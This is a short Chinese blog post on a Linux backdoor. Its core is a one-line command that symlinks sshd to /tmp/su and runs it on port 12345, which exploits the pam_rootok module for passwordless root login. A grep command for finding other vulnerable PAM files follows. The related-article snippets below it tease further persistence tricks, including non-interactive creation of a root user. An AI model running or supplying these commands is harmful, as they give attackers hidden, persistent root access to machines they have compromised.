linux后门

作者: broeeee | 来源:发表于2021-12-09 17:53 被阅读0次

软链接后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345

ssh启用了PAM,用到了pam_rootok模块

同样还具有pam_rootok模块的文件还有

find /etc/pam.d/ | xargs grep "pam_rootok"

同样,你复制改名了,软连接调用了也可以生效.

相关文章

  • linux后门

    软链接后门 ssh启用了PAM,用到了pam_rootok模块 同样还具有pam_rootok模块的文件还有 同样...

  • 常用linux后门

    一。添加root权限用户一句话非交互式添加root权限用户useradd -o -u 0 -g 0 test &&...

  • linux后门维系

    信息搜集 以下为虚拟机效果: w/who显示目前登入系统的用户信息 无痕终端操作 执行完成后当前终端所有操作不被记...

  • Linux后门维系(二)

    先推荐下我最喜欢的Linux后门系列文章,在我的收藏夹里藏了好久了,来自奇安信的公众号。 《红队实战攻防技术分享:...

  • 一些常见后门

    linux后门 一、前提:已经是root用户,想留一个后门 suid shell .woot前面的'.'并不是必须...

  • Linux后门维系(三)—— PAM后门 + transfer.

    查看pam版本并下载 修改并编译pam_unix_auth.c文件 pam_unix_auth.c 修改前 pam...

  • Linux安全之SSH后门

    一.查看SSH版本[root@redkey vmshare]# ssh -V OpenSSH_5.3p1, Ope...

  • Linux后门的几种姿势

    转载自 https://evilanne.github.io/2017/08/26/Linux%E5%90%8E%...

  • 各类后门整理_春秋社区

    Unix Bash 远控后门 简介利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持...

  • Linux后门入侵检测工具

    rootkit病毒分为文件级别和内核级别。 rootkit后门检测工具:chkrootkit、RKHunter 【...

网友评论

    本文标题:linux后门

    本文链接:https://www.haomeiwen.com/subject/vpgffrtx.html